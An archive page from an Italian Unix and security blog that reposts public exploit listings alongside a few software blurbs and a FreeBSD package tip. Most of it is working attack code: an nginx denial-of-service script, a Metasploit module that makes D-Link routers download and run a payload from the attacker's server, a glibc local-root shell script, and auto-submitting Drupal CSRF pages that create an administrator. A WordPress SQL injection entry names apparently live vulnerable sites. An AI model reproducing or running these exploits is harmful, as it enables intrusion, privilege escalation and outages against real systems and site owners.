MondoUnix - Unix,Linux,FreeBSD,Howto,Networking,Ipv6

21May/130

Moxiecode Image Manager 3.1.5 Shell Upload

I want to warn you about vulnerabilities in Moxiecode Image Manager 
(MCImageManager). This is commercial plugin for TinyMCE. It concerns as 
MCImageManager, as all web applications which have MCImageManager in their 
bundle.
 
These are Arbitrary File Uploading vulnerabilities, which lead to Code 
Execution on IIS and Apache web servers.
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are Moxiecode Image Manager 3.1.5 and previous versions.
 
-------------------------
Affected vendors:
-------------------------
 
Moxiecode
http://www.moxiecode.com
 
----------
Details:
----------
 
Arbitrary File Uploading (WASC-31):
 
http://site/path/tiny_mce/plugins/imagemanager/pages/im/index.html
 
Execution of arbitrary code is possible due to bypass of program's security 
filters (on IIS and Apache web servers).
 
Code will execute via file uploading. Program is vulnerable to two methods 
of code execution:
 
1. Via using of symbol ";" (1.asp;.txt) in file name (IIS).
 
2. Via double extension (1.php.txt) (Apache with special configuration).
 
MCImageManager has only two such holes in comparison with three holes in 
MCFileManager (about which I wrote earlier). The attack via folder name was 
not working already in version 3.1.0.4. Both these web applications have 
other vulnerabilities about which I'll write later.
 
------------
Timeline:
------------ 
 
2013.03.31 - briefly informed developer (together with other issues related 
to TinyMCE).
2013.04.01 - informed developer in detail.
2013.04.03 - announced at my site.
2013.04.04 - the developer planned to fix these holes in new version in 
nearest days.
2013.05.18 - disclosed at my site (http://websecurity.com.ua/6416/).
 
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Tag: 0DAY, EXPLOIT, IMAGE MANAGER, LINUX, MOXICODE, PHP, POC, PROOF OF CONCEPT, REMOTE, SECURITY, SHELL UPLOAD, SICUREZZA, UNIX, VULNERABILITIES, VULNERABILITY, WEBAPPS Nessun commento

21May/130

Nginx 1.3.9 / 1.4.0 Denial Of Service

# Exploit Title: nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2028)
# Date: 16.05.2013
# Exploit Author: Mert SARICA - mert [ . ] sarica [ @ ] gmail [ . ] com - http://www.mertsarica.com
# Vendor Homepage: http://nginx.org/
# Software Link: http://nginx.org/download/nginx-1.4.0.tar.gz
# Version: 1.3.9-1.4.0
# Tested on: Kali Linux & Windows XP (nginx v1.4.0)
# CVE : CVE-2013-2028
 
import httplib
import time
import socket
import sys
import os
 
# Vars & Defs
debug = 0
dos_packet = 0xFFFFFFFFFFFFFFEC
socket.setdefaulttimeout(1)
 
packet = 0
 
def chunk(data, chunk_size):
    chunked = ""
    chunked += "%s\r\n" % (chunk_size)
    chunked += "%s\r\n" % (data)
    chunked += "0\r\n\r\n"
    return chunked
 
if sys.platform == 'linux-i386' or sys.platform == 'linux2':
        os.system("clear")
elif sys.platform == 'win32':
        os.system("cls")
else:
        os.system("cls")
 
print "======================================================================"
print u"nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2028) [http://www.mertsarica.com]"
print "======================================================================"
 
if len(sys.argv) < 2:
        print "Usage: python nginx_dos.py [target ip]\n"
        print "Example: python nginx_dos.py 127.0.0.1\n"
        sys.exit(1)
else:
    host = sys.argv[1].lower()
 
while packet <= 5:
 
    body = "Mert SARICA"
    chunk_size = hex(dos_packet + 1)[3:]
    chunk_size = ("F" + chunk_size[:len(chunk_size)-1]).upper()
 
    if debug:
        print "data length:", len(body), "chunk size:", chunk_size[:len(chunk_size)]
 
    try:
        con = httplib.HTTPConnection(host)
        url = "/mertsarica.php"
        con.putrequest('POST', url)
        con.putheader('User-Agent', "curl/7.30.0")
        con.putheader('Accept', "*/*")
        con.putheader('Transfer-Encoding', 'chunked')
        con.putheader('Content-Type', "application/x-www-form-urlencoded")
        con.endheaders()
        con.send(chunk(body, chunk_size[:len(chunk_size)]))
    except:
        print "Connection error!"
        sys.exit(1)
 
    try:
        resp = con.getresponse()
        print(resp.status, resp.reason)
    except:
        print "[*] Knock knock, is anybody there ? (" + str(packet) + "/5)"
 
    packet = packet + 1
 
    con.close()
 
print "[+] Done!"

Tag: 0DAY, DENIAL OF SERVICE, DOS, EXPLOIT, LINKSYS, NGINX, REMOTE, SECURITY, SICUREZZA, UNIX, VULNERABILITIES, VULNERABILITY, WEB SERVER Nessun commento

21May/130

D-Link DIR615h OS Command Injection

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'D-Link DIR615h OS Command Injection',
      'Description' => %q{
          Some D-Link Routers are vulnerable to an authenticated OS command injection on
        their web interface, where default credentials are admin/admin or admin/password.
        Since it is a blind os command injection vulnerability, there is no output for the
        executed command when using the cmd generic payload. This module was tested against
        a DIR-615 hardware revision H1 - firmware version 8.04. A ping command against a
        controlled system could be used for testing purposes. The exploit uses the wget
        client from the device to convert the command injection into an arbitrary payload
        execution.
      },
      'Author'      =>
        [
          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
          'juan vazquez' # minor help with msf module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'BID', '57882' ],
          [ 'EDB', '24477' ],
          [ 'OSVDB', '90174' ],
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-008' ]
        ],
      'DisclosureDate' => 'Feb 07 2013',
      'Privileged'     => true,
      'Platform'       => ['linux','unix'],
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'CMD',
            {
            'Arch' => ARCH_CMD,
            'Platform' => 'unix'
            }
          ],
          [ 'Linux mipsel Payload',
            {
            'Arch' => ARCH_MIPSLE,
            'Platform' => 'linux'
            }
          ],
        ],
      'DefaultTarget'  => 1,
      ))
 
    register_options(
      [
        OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
        OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]),
        OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
      ], self.class)
  end
 
 
  def request(cmd)
    begin
      res = send_request_cgi({
        'uri'    => @uri,
        'method' => 'GET',
        'vars_get' => {
          "page" => "tools_vct",
          "hping" => "0",
          "ping_ipaddr" => "1.1.1.1`#{cmd}`",
          "ping6_ipaddr" => ""
        }
      })
      return res
    rescue ::Rex::ConnectionError
      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
      return nil
    end
  end
 
  def exploit
    downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
    @uri = '/tools_vct.htm'
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']
    @timeout = 5
 
    #
    # testing Login
    #
    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
    begin
      res= send_request_cgi({
        'uri' => '/login.htm',
        'method' => 'POST',
        'vars_post' => {
          "page" => "login",
          "submitType" => "0",
          "identifier" => "",
          "sel_userid" => user,
          "userid" => "",
          "passwd" => pass,
          "captchapwd" => ""
        }
      })
      if res.nil? or res.code == 404
        fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
      end
      if res.body =~ /\<script\ langauge\=\"javascript\"\>showMainTabs\(\"setup\"\)\;\<\/script\>/
        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
      else
        fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
      end
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
    end
 
    if target.name =~ /CMD/
      if not (datastore['CMD'])
        fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
      end
      cmd = payload.encoded
      res = request(cmd)
      if (!res)
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
      else
        print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
      end
      return
    end
 
    #thx to Juan for his awesome work on the mipsel elf support
    @pl = generate_payload_exe
    @elf_sent = false
 
    #
    # start our server
    #
    resource_uri = '/' + downfile
 
    if (datastore['DOWNHOST'])
      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
    else
      #do not use SSL
      if datastore['SSL']
        ssl_restore = true
        datastore['SSL'] = false
      end
 
      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
        srv_host = Rex::Socket.source_address(rhost)
      else
        srv_host = datastore['SRVHOST']
      end
 
      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
      start_service({'Uri' => {
        'Proc' => Proc.new { |cli, req|
          on_request_uri(cli, req)
        },
        'Path' => resource_uri
      }})
 
      datastore['SSL'] = true if ssl_restore
    end
 
    #
    # download payload
    #
    print_status("#{rhost}:#{rport} - Asking the D-Link device to download #{service_url}")
    #this filename is used to store the payload on the device
    filename = rand_text_alpha_lower(8)
 
    #not working if we send all command together -> lets take three requests
    cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
    res = request(cmd)
    if (!res)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end
 
    # wait for payload download
    if (datastore['DOWNHOST'])
      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the D-Link device to download the payload")
      select(nil, nil, nil, datastore['HTTP_DELAY'])
    else
      wait_linux_payload
    end
    register_file_for_cleanup("/tmp/#{filename}")
 
    print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
    select(nil, nil, nil, @timeout)
 
    #
    # chmod
    #
    cmd = "chmod 777 /tmp/#{filename}"
    print_status("#{rhost}:#{rport} - Asking the D-Link device to chmod #{downfile}")
    res = request(cmd)
    if (!res)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end
    print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
    select(nil, nil, nil, @timeout)
 
    #
    # execute
    #
    cmd = "/tmp/#{filename}"
    print_status("#{rhost}:#{rport} - Asking the D-Link device to execute #{downfile}")
    res = request(cmd)
    if (!res)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end
 
  end
 
  # Handle incoming requests from the server
  def on_request_uri(cli, request)
    #print_status("on_request_uri called: #{request.inspect}")
    if (not @pl)
      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
      return
    end
    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
    @elf_sent = true
    send_response(cli, @pl)
  end
 
  # wait for the data to be sent
  def wait_linux_payload
    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
 
    waited = 0
    while (not @elf_sent)
      select(nil, nil, nil, 1)
      waited += 1
      if (waited > datastore['HTTP_DELAY'])
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
      end
    end
  end
 
end

Tag: 0DAY, COMMAND EXECUTION, COMMAND INJECTION, D-LINK, DIR615H, EXPLOIT, FIRMWARE, FRAME, GETCONFIG, METASPLOIT, PHP, REMOTE, SECURITY, SICUREZZA, UNIX, VULNERABILITIES Nessun commento

21May/130

Glibc 2.11.3 / 2.12.x LD_AUDIT libmemusage.so Local Root

#!/bin/sh
#
# [+] Glibc <= 2.12.x, 2.11.3, 2.12.2 LD_AUDIT libmemusage.so local root exploit
#
# Edited by Todor Donev (todor dot donev at gmail dot com)
# This is another exploit for CVE-2010-3856
#
# Thanks to Tavis 'taviso' Ormandy, zx2c4, Marco 'raptor' Ivaldi, Stiliyan Angelov
# and Tsvetelina Emirska
#
# Another exploits:
# http://www.0xdeadbeef.info/exploits/raptor_ldaudit
# http://www.0xdeadbeef.info/exploits/raptor_ldaudit2
# http://www.exploit-db.com/exploits/18105/
# http://seclists.org/fulldisclosure/2010/Oct/257
# http://seclists.org/bugtraq/2010/Oct/200
#
echo "[+] Setting umask to 0 so we have world writable files."
umask 0
echo "[+] Preparing binary payload.."
cat > /tmp/payload.c <<_EOF
void __attribute__((constructor)) init()
{
    unlink("/lib/sploit.so");
    setuid(0);
    setgid(0);
    setenv("HISTFILE", "/dev/null", 1);
    execl("/bin/sh", "/bin/sh", "-i", 0);
}
_EOF
gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
echo "[+] Writing root owned world readable file in /lib"
LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="/lib/sploit.so" ping 2>/dev/null
echo "[+] Filling the lib file with lib contents."
cat /tmp/exploit > /lib/sploit.so
rm /tmp/payload.c /tmp/exploit
echo "[+] Executing payload.."
LD_AUDIT="sploit.so" ping

Tag: EXPLOIT, GLIBC, LD_AUDIT, LIBMEMUSAGE, LIBMEMUSAGE.SO, LINUX, LOCAL, LOCAL ROOT, PRIVILEGE ESCALATION, ROOT, SECURITY, SICUREZZA, VULNERABILITIES, VULNERABILITY Nessun commento

21May/130

MPlayer 1.1.1 for Linux

MPlayer for Linux is a movie player which runs on many systems (see the documentation). It plays most MPEG/VOB, AVI, Ogg/OGM, VIVO, ASF/WMA/WMV, QT/MOV/MP4, RealMedia, Matroska, NUT, NuppelVideo, FLI, YUV4MPEG, FILM, RoQ, PVA files, supported by many native, XAnim, and Win32 DLL codecs. You can watch VideoCD, SVCD, DVD, 3ivx, DivX 3/4/5, WMV and even H.264 movies.

Another great feature of MPlayer is the wide range of supported output drivers. It works with X11, Xv, DGA, OpenGL, SVGAlib, fbdev, AAlib, DirectFB, but you can use GGI, SDL (and this way all their drivers), VESA (on every VESA compatible card, even without X11!) and some low level card-specific drivers (for Matrox, 3Dfx and ATI), too! Most of them support software or hardware scaling, so you can enjoy movies in fullscreen. MPlayer supports displaying through some hardware MPEG decoder boards, such as the Siemens DVB, DXR2 and DXR3/Hollywood+.

MPlayer has an onscreen display (OSD) for status information, nice big antialiased shaded subtitles and visual feedback for keyboard controls. European/ISO 8859-1,2 (Hungarian, English, Czech, etc), Cyrillic and Korean fonts are supported along with 12 subtitle formats (MicroDVD, SubRip, OGM, SubViewer, Sami, VPlayer, RT, SSA, AQTitle, JACOsub, PJS and our own: MPsub). DVD subtitles (SPU streams, VOBsub and Closed Captions) are supported as well.

Most of time-critical parts are optimized for Intel/AMD (MMX/MMX2/SSE/SSE2/3DNow!/3DNowEx), PowerPC G4 (Altivec), SPARC (VIS), ARM PDAs and the Sony Playstation 2.

MPlayer comes with a GUI that is not built by default. The GUI section of the documentation explains how to enable it. Several external MPlayer frontends provide alternative GUIs.

Supported Input Formats: (S)VCD (Super Video CD), CDRwin's .bin image file, DVD, including encrypted DVD, MPEG-1/2 (ES/PS/PES/VOB), AVI file format, ASF/WMV/WMA format, QT/MOV/MP4 format, RealAudio/RealVideo format, Ogg/OGM files, Matroska, NUT, NSV (Nullsoft Streaming Video), VIVO format, FLI format, NuppelVideo format, yuv4mpeg format, FILM (.cpk) format, RoQ format, PVA format, streaming via HTTP/FTP, RTP/RTSP, MMS/MMST, MPST, SDP, TV grabbing,

Supported Video Codecs: MPEG-1 (VCD) and MPEG-2 (SVCD/DVD/DVB) video, MPEG-4 ASP in all variants including DivX ;-), OpenDivX (DivX4), DivX 5 (Pro), Xvid, MPEG-4 AVC aka H.264, Windows Media Video 7/8 (WMV1/2), Windows Media Video 9 (WMV3) (using x86 DLL), RealVideo 1.0, 2.0 (G2), RealVideo 3.0 (RP8), 4.0 (RP9) (using Real libraries), Sorenson v1/v3 (SVQ1/SVQ3), Cinepak, RPZA and other QuickTime codecs, DV video, 3ivx, Intel Indeo3 (3.1, 3.2), Intel Indeo 4.1 and 5.0 (using x86 DLL or XAnim codecs), VIVO 1.0, 2.0, I263 and other H.263(+) variants (using x86 DLL), MJPEG, AVID, VCR2, ASV2 and other hardware formats, FLI/FLC, HuffYUV, various old simple RLE-like formats

Supported Audio Codecs: MPEG layer 1, 2, and 3 (MP3) audio, AC3/A52, E-AC3, DTS (Dolby Digital) audio (software or SP/DIF), AAC (MPEG-4 audio), WMA (DivX Audio) v1, v2, WMA 9 (WMAv3), Voxware audio, ACELP.net etc (using x86 DLLs), RealAudio: COOK, SIPRO, ATRAC3 (using Real libraries), RealAudio: DNET and older codecs, QuickTime: Qclp, Q-Design QDMC/QDM2, MACE 3/6 (using QT libraries), ALAC, Ogg Vorbis audio, VIVO audio (g723, Vivo Siren) (using x86 DLL), alaw/ulaw, (ms)gsm, pcm, *adpcm and other simple old audio formats,

Fonte : http://pkgs.org/mplayer-for-linux/

Tag: ASF, AUDIO, AVI, DENOISE, DVD, FILTERS, IMAGE, LINUX, MOTION, MP4, MPLAYER, SOFTWARE, UNIX, VIDEO, WMA, WMV Nessun commento

21May/130

WordPress ProPlayer Plugin SQL Injection

##############
# Exploit Title : WordPress ProPlayer Plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Plugin Link  : http://wordpress.org/plugins/proplayer/
#
# Home : www.ashiyane.org
#
# Security Risk : High
#
# Version : 4.7.9.1
#
# Dork : inurl:wp-content/plugins/proplayer/playlist-controller.php?id=
#
# Tested on: Linux
#
##############
#Location:site/wp-content/plugins/proplayer/playlist-controller.php?id=[SQL]
#
#
#DEm0:
# http://www.andrewardizzoia.info/wp-content/plugins/proplayer/playlist-controller.php?id=32-0%27
#
# http://www.straightlinehdd.com/en/fear-no-ground/wp-content/plugins/proplayer/playlist-controller.php?id=151-0%27
#
# http://djmikewallace.com/wp-content/plugins/proplayer/playlist-controller.php?id=42-0%27
#
# http://www.rogerseifert.com/wp-content/plugins/proplayer/playlist-controller.php?id=51-0%27
#
# http://www.nickyhager.info/wp-content/plugins/proplayer/playlist-controller.php?id=750-0%27
#
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############

Tag: 0DAY, EXPLOIT, LINUX, PHP, PROPLAYER, PROPRLAYER PLUGIN, REMOTE, SECURITY, SICUREZZA, SQL INJECTION, SQL-I, UNIX, VULNERABILITIES, VULNERABILITY, WEBAPPS, WORDPRESS, WORDPRESS SECURITY Nessun commento

18May/131

Drupal 6.x/7.x Google Authenticator login Access Bypass

Advisory ID: DRUPAL-SA-CONTRIB-2013-047
Project: Google Authenticator login (third-party module)
Version: 6.x, 7.x
Date: 2013-May-15
Security risk: Moderately critical
Exploitable from: Remote
Vulnerability: Access bypass
Description
This module will allow you to add Time-based One-time Password Algorithm (also called "Two Step Authentication" or "Multi-Factor Authentication") support to user logins. It works with Google's Authenticator app system and support most (if not all) OATH based HOTP/TOTP systems.
Accidental removal of account configuration.
In certain scenarios, Google Authenticator login incorrectly determines the user's account name. The change in account name could cause the two-factor authentication for existing accounts to be lost, allowing users to log in using just username and password.
This vulnerability is mitigated by the fact while Google Authenticator login's additional verification is by-passed, a username and password are still required to log in.
One Time Password (OTP) replay
If an attacker can intercept a login request with a username, password and OTP, an attacker could use this same data again to login to the website.
This vulnerability is mitigated by the fact that an attacker who can intercept a login request with this level of detail can usually also intercept the ongoing session identifying token.
CVE identifier(s) issued
A CVE identifier will be requested, and added upon issuance, in accordance with Drupal Security Team processes.
Versions affected
Google Authenticator login 6.x-1.x versions prior to 6.x-1.2.
Google Authenticator login 7.x-1.x versions prior to 7.x-1.4.
Drupal core is not affected. If you do not use the contributed Google Authenticator login module, there is nothing you need to do.
Solution
Install the latest version:
If you use the Google Authenticator login module for Drupal 6.x, upgrade to Google Authenticator login module 6.x-1.2
If you use the Google Authenticator login module for Drupal 7.x, upgrade to Google Authenticator login module 7.x-1.4
Also see the Google Authenticator login project page.
Reported by
Ivo Van Geertruyen of the Drupal Security Team
Lode Vanstechelman
Fixed by
Peter Droogmans the module maintainer
Jelle Sebreghts the module maintainer
Ivo Van Geertruyen of the Drupal Security Team
Coordinated by
Ivo Van Geertruyen of the Drupal Security Team
Contact and More Information
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact.
Learn more about the Drupal Security team and their policies, writing secure code for Drupal, and securing your site.

Tag: 0DAY, BYPASS, CMS, DRUPAL, EXPLOIT, GOOGLE AUTHENTICATOR, LINUX, LOGIN ACCESS BYPASS, PHP, REMOTE, SECURITY, SICUREZZA, UNIX, VULNERABILITIES, VULNERABILITY, WEBAPPS 1 commento

18May/130

Pingus 0.7.6 for Linux

Pingus for Linux is a free Lemmingstm-like puzzle game covered under the GNU GPL.
Pingus features currently 77 playable levels and runs under a wide variety of operating systems (Linux, Windows, MacOSX, etc.)

Pingus has started at the end of 1998 with the simple goal to create a Free (as in freedom, not as in free beer) Lemmingstm clone.

The Free means you get the sources and are allowed and encouraged to change and distribute them.
You basically get everything that I used to create this game. In the years it has grown than quite a bit over the original goal and become something more than just a clone, we have original artwork, a built-in level editor, new actions, multiplayer and a few other features.

Fonte : http://pkgs.org/pingus-for-linux/

Tag: ACTION, GAME, GAMES, GNU GPL, LINUX, OPENSOURCE, PINGUS, PUZZLE, PUZZLE GAME, SOFTWARE, UNIX Nessun commento

18May/130

Drupal CMS 7.12 Multiple Vulnerabilities

# Exploit Title    : Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities
# Date             : 02-03-2012
# Author           : Ivano Binetti (http://ivanobinetti.com)
# Software link    : http://ftp.drupal.org/files/projects/drupal-7.12.zip
# Vendor site      : http://drupal.org
# Version          : 7.12 (and lower)
# Tested on        : Debian Squeeze (6.0)
# Original Advisory: http://ivanobinetti.blogspot.com/2012/03/drupal-cms-712-latest-stable-release.html
# EDB-ID           : 18564 (http://www.exploit-db.com/exploits/18564/)  
# Other Advisory   : http://packetstormsecurity.org/files/110404/Drupal-CMS-7.12-Cross-Site-Request-Forgery.html
# Other Advisory   : http://www.1337day.com/exploits/17611
+---------------------------------------------------------------------------------------------------------------------------------------------------+
+-------------------------[Multiple Vulnerabilities by Ivano Binetti]-------------------------------------------------------------------------------+
Summary
 
1)Introduction
2)Vulnerabilities Description
 2.1 Poor Session Checking (CSRF to change any Drupal settings)
 2.2 Poor Session Checking (CSRF to Force administrator logout)
 2.3 Poor Session Checking (POST and GET method)
 2.4 Poor Session Checking (Http Referer)
3)Exploit
 3.1 Exploit (Add Administrator)
 3.2 Exploit (Force logout)
 
+---------------------------------------------------------------------------------------------------------------------------------------------------+
 
1)Introduction
Drupal "is an open source content management platform powering millions of websites and applications. Its built, used, and supported by an active
and diverse community of people around the world".
 
2)Vulnerability Description
Drupal 7.12 -latest stable release - suffers from multiple vulnerabilities which could allow an attacker to gain access to the management interface.
 
 2.1 Poor Session Checking (CSRF to change any Drupal settings)
 Drupal, to secure changes made by administrators or users through web management interface, uses "form_token" parameter which is sent inside
 any http POST request.
 There is a security flaw inside the logic with which this parameter is generated, as is used the same parameter for for similar operations
 (the same "form_id") in the same session (for example for article's creation Drupal assigns the same "form_token", for admin/user
 creation Drupal assigns the same "form_token" and so on).
 Another flaw is inside "form_buid_id" parameter, which is used to fetch state from a database table during certain operations. This parameter
 is generated different for any operation an admin/user performs, but Drupal allows to use any other Drupal generated "form_buid_id" parameter
 (like this: "form-0iFqLlofT1uuJ_uwXPNdVlc_J9KL20oZE15dK9hxuQ8") to make changes to Drupal settings through web management  interface.
 So, even if Drupal  creates a different "form_buid_id" for any operation you can use another "form_buid_id"compatible with Drupal instead of that
 generated by Drupa for that specific operation.
 These flaws can be used by an attacker who knows the values of "form_buid_id" and "form_token" parameters (for example an internal attacker
 performing a "Man in The Middle Attack" or an external attacker that controls an internal client by an client-side exploit, an external attacker
 that controls directly a Drupal admin by a client-side exploit and son on. There are many possibilities) to create an "ad-hoc" crafted web page
 in order to makes any Drupal changes (add administrator, delete administrator, add web pages, delete web pages, ....) when a Drupal administrator
 or User browses that crafted web page.
 
 
 2.2 Poor Session Checking (CSRF to Force administrator logout)
 There is another vulnerability - always related to poor session checking / improper input validation - in "<drupal_ip>/user/logout" which allows
 an attacker to create a crafted web page an force logout of Drupal administrator/users at web management interface. This vulnerability - forcing
 administrator logout - will aid an attacker to sniff authentication credentials when a "Man in The Middle Attack" is performed.
 
 2.3 Poor Session Checking (POST and GET method)
 Drupal does not check "GET" or "POST" http method allowing, even though normal logout is made via http GET request, to exploit the above vulnerability 
 using http POST method.
 
 2.4 Poor Session Checking (Http Referer)
 Drupal, furthermore, does not perform "http referer" checking, allowing to exploit all above described vulnerabilities.
 
3)Exploit
 
 3.1 Exploit (Add Administrator)
 <html>
 <body onload="javascript:document.forms[0].submit()">
 <H2>CSRF Exploit change user to admin</H2>
 <form method="POST" name="form0" action="http://<drupal_ip>:80/drupal/admin/people/create?render=overlay&render=overlay">
 <input type="hidden" name="name" value="new_admin"/>
 <input type="hidden" name="mail" value="new_admin@new_admin.com"/>
 <input type="hidden" name="pass[pass1]" value="new_password"/>
 <input type="hidden" name="pass[pass2]" value="new_password"/>
 <input type="hidden" name="status" value="1"/>
 <input type="hidden" name="roles[3]" value="3"/>
 <input type="hidden" name="timezone" value="Europe/Prague"/>
 <input type="hidden" name="form_build_id" value="form-oUkbOYDjyZag-LhYFHvlPXM1rJzOHCjlHojoh_hS3pY"/>
 <input type="hidden" name="form_token" value="cU7nmlpWu-a4UKGFDBcVjEutgvoEidfK1Zgw0HFAtXc"/>
 <input type="hidden" name="form_id" value="user_register_form"/>
 <input type="hidden" name="op" value="Create new account"/>
 </form>
 </body>
 </html>
 
 
 3.2 Exploit (Force logout)
 <html>
 <body onload="javascript:document.forms[0].submit()">
 <H2>CSRF Exploit to logout Admin</H2>
 <form method="POST" name="form0" action="http://<drupal_ip>:80/drupal/user/logout">
 </form>
 </body>
 </html>

Tag: 0DAY, ADD ADMINISTRATOR, CMS, CROSS SITE REQUEST FORGERY, CSRF, DRUPAL, EXPLOIT, FORCE LOGOUT, LINUX, MULTIPLE, PHP, REMOTE, SECURITY, SICUREZZA, UNIX, VULNERABILITIES, VULNERABILITY, WEBAPPS Nessun commento

17May/130

FreeBSD : risolvere errore “has a missing dependency”

Se dopo degli aggiornamenti o installazione di vari software riscontrate un errore simile :

# pkg check -da

devel/gamin has a missing dependency: lang/perl5.12
devel/gio-fam-backend has a missing dependency: lang/perl5.12
irc/irssi has a missing dependency: lang/perl5.12
irc/irssi-scripts has a missing dependency: lang/perl5.12
mail/maildrop has a missing dependency: lang/perl5.12
misc/mc has a missing dependency: lang/perl5.12
mail/p5-Mail-SpamAssassin has a missing dependency: lang/perl5.12

Eseguite il seguente comando :

# pkg set -o lang/perl5.14:lang/perl5.12

Dove "perl5.14" è la versione attualmente installata sul vostro sistema .

Fonte : http://lists.freebsd.org

Tag: FREEBSD, HOWTO, LANG, MISSING DEPENDENCY, PERL, PKG, PKG CHECK, PKG SET, PORTS, SOFTWARE, UNIX Nessun commento

Precedenti »

MondoUnix ADV

Segui MondoUnix

MondoUnix on Facebook

Categorie

APACHE (11)
BASH (15)
CENTOS (22)
DATABASE (7)
DEBIAN (6)
DRUPAL (17)
ESX (7)
ESXI (9)
EXPLOIT (902)
FEDORA (21)
FREEBSD (55)
HI-TECH NEWS (50)
HOWTO (171)
IPTABLES (8)
IPV6 (9)
JOOMLA (63)
LINUX (353)
LOCAL (65)
MYSQL (4)
NETBSD (11)
NETWORKING (78)
OFF TOPICS (3)
OPENBSD (9)
OPENINDIANA (6)
OPENSOLARIS (7)
PERL (7)
PF (1)
PHP (137)
PROGRAMMAZIONE (17)
PROXMOX (2)
PYTHON (6)
QEMU (2)
REMOTE (92)
RHEL (21)
SCIENTIFIC LINUX (11)
SICUREZZA (943)
SISTEMI OPERATIVI (33)
SOFTWARE (123)
SWITCH (1)
UBUNTU (12)
UNIX (414)
VIRTUALIZZAZIONE (17)
WEB (19)
WEBAPPS (752)
WORDPRESS (1)
WORDPRESS HOWTO (14)
WORDPRESS SECURITY (219)

Articoli recenti

Utility e Tool

Archivio

IPv6 Certified

Latest banned ip

101.64.16.226	22/05/2013	FTP
80.241.220.11	22/05/2013	WEB
120.33.245.12	22/05/2013	WEB
120.43.23.198	22/05/2013	WEB
213.229.86.240	22/05/2013	WEB
223.82.244.22	22/05/2013	SSH
68.6.188.32	22/05/2013	WEB
198.57.193.207	21/05/2013	WEB
37.112.82.195	21/05/2013	WEB
202.74.46.90	21/05/2013	WEB